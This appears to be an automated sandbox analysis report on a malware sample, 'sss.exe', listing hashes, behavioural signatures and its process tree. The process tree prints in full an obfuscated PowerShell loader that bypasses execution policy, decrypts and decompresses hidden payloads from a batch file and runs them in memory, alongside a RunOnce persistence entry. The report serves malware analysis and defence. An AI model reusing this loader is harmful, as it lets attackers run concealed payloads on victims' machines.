Analysis
-
max time kernel
133s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
07/05/2024, 19:17
Static task
static1
Behavioral task
behavioral1
Sample
sss.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
sss.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral3
Sample
sss.exe
Resource
win11-20240426-en
General
-
Target
sss.exe
-
Size
323KB
-
MD5
6bbf50445493a5565d3e87d46b3ddeb1
-
SHA1
c20afb96ae13b358479eb21887039dae27f12de7
-
SHA256
37c1bc1d1fe8d46db33baeb3ab8e587541bfebddaea7d42cdd87b34fd3632c55
-
SHA512
89262e531367e6d696fea5dfe5d8fb8cbde752df2a295fccc5cd16c9fc30db65f1175e30066255cf184fa647c75f62afcd9818fb048bb6bea6d182f93b9c33e4
-
SSDEEP
6144:9kGp0yN90QEZ/ysH7gglxMzXw0XEBorwLt4:iy90TiBc0UBv6
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" sss.exe -
pid Process 4748 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4748 powershell.exe 4748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4748 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 5108 wrote to memory of 4116 5108 sss.exe 84 PID 5108 wrote to memory of 4116 5108 sss.exe 84 PID 4116 wrote to memory of 4748 4116 cmd.exe 88 PID 4116 wrote to memory of 4748 4116 cmd.exe 88 PID 4116 wrote to memory of 4748 4116 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\sss.exe"C:\Users\Admin\AppData\Local\Temp\sss.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\SYSTEM32\cmd.execmd /c "sss.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2wJDIaXe4hsZSNlc5IH3OVTks52Y1+GyrYbU9tUwRmM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XuYmo8HG57qtYb5RfVzIGw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrRXX=New-Object System.IO.MemoryStream(,$param_var); $gOjVy=New-Object System.IO.MemoryStream; $TOrgh=New-Object System.IO.Compression.GZipStream($BrRXX, [IO.Compression.CompressionMode]::Decompress); $TOrgh.CopyTo($gOjVy); $TOrgh.Dispose(); $BrRXX.Dispose(); $gOjVy.Dispose(); $gOjVy.ToArray();}function execute_function($param_var,$param2_var){ $oTFLM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HmfOW=$oTFLM.EntryPoint; $HmfOW.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sss.bat';$usoNB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sss.bat').Split([Environment]::NewLine);foreach ($aNcJt in $usoNB) { if ($aNcJt.StartsWith(':: ')) { $sorVg=$aNcJt.Substring(3); break; }}$payloads_var=[string[]]$sorVg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
239KB
MD51e6b15cb7c367571ede7605ec000190a
SHA1972d5b6e60093a4e47a5370cc5c5c1508405b2c2
SHA25637ee5a472d73c7bb978cfb8810dbcd10966f1cf1e15d2e395a28ca892a375f33
SHA512e9592061ca7a5724422e6b17f19fe95777d09d283c049954afa863de6e1f0abfa0e5a92f209d09cc914cf8329d6c20acf9bc384236b6b2fcac0c038d5efc2698
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82